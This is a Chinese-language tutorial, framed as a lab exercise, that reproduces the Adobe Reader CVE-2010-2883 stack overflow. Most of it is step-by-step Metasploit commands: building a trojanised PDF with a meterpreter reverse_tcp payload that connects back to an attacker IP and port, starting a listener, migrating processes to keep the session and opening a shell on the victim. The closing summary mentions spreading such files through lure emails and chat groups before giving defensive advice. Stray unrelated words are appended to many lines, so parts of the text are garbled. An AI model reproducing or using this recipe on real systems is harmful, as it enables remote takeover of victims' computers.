一、漏洞概述:linux
CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可容许任意代码远程执行。”shell
影响版本:Adobe Reader 8.2.4 - 9.3.4windows
二、实验环境微信
攻击机:kali linux 2017session
靶机:win 7 + Adobe Reader 9.3tcp
三、实验工具:工具
连接: https://pan.baidu.com/s/1sQOxcGlb8r095e1oCBipPg 密码: 5fta字体
四、漏洞复现spa
在win 7 安装好Adobe Reader 9.3 3d
进入kali,使用Metasploit生成PDF木马文件
打开msf root@kali:~# msfconsole 搜索Adobe渗透模块 msf > search adobe_cooltype_sing 调用渗透模块 msf > use exploit/windows/fileformat/adobe_cooltype_sing 查看模块详情 msf exploit(adobe_cooltype_sing) > info
调用攻击载荷,反向链接到攻击机 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 设置kali 的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.190.130 设置本地监听端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 设置带有后门程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME GeekFZ.pdf 执行渗透生成文件 msf exploit(adobe_cooltype_sing) > exploit
将PDF木马文件拷贝到kali linux的桌面
root@kali:~# cp /root/.msf4/local/GeekFZ.pdf /root/桌面/GeekFZ.pdf
Metasploit开启shell监听会话,等待肉鸡上线
返回 msf exploit(adobe_cooltype_sing) > back 使用handler模块 msf > use exploit/multi/handler 回弹一个tcp链接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 设置监听IP地址(跟PDF木马文件同样,即kali的IP) msf exploit(handler) > set LHOST 192.168.190.130 设置监听的端口(跟PDF木马文件同样) msf exploit(handler) > set LPORT 8888 开启监听 msf exploit(handler) > exploit
将PDF木马文件拷贝到win 7并打开
kali成功获取shell
到session中链接它,并用Meterpreter控制肉鸡
查看sessions msf exploit(handler) > sessions 链接session msf exploit(handler) > sessions -i 2
注:考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,因此须要快速切换到其余系统进程,这样会话才不会丢失。
获取进程 meterpreter > ps 切换进程 meterpreter > migrate 3688
获取Dos shell meterpreter > shell
实验总结:
能够看到,最终因为Adobe Reader 存在CVE-2010-2883这个高危漏洞,致使电脑打开特殊定制的pdf以后,直接变成肉鸡。与以前文章中的Office和Flash 0day漏洞相似,真实环境下,不少黑客会利用此方法,结合社会工程学,例如经过诱导邮件、各类论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。
在这里也呼吁你们:日常要很是当心陌生办公文件,不管是pdf仍是word等,打开以前必定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽可能保证电脑的软件处于最新版,这样才能最大程度下降被攻击的概率。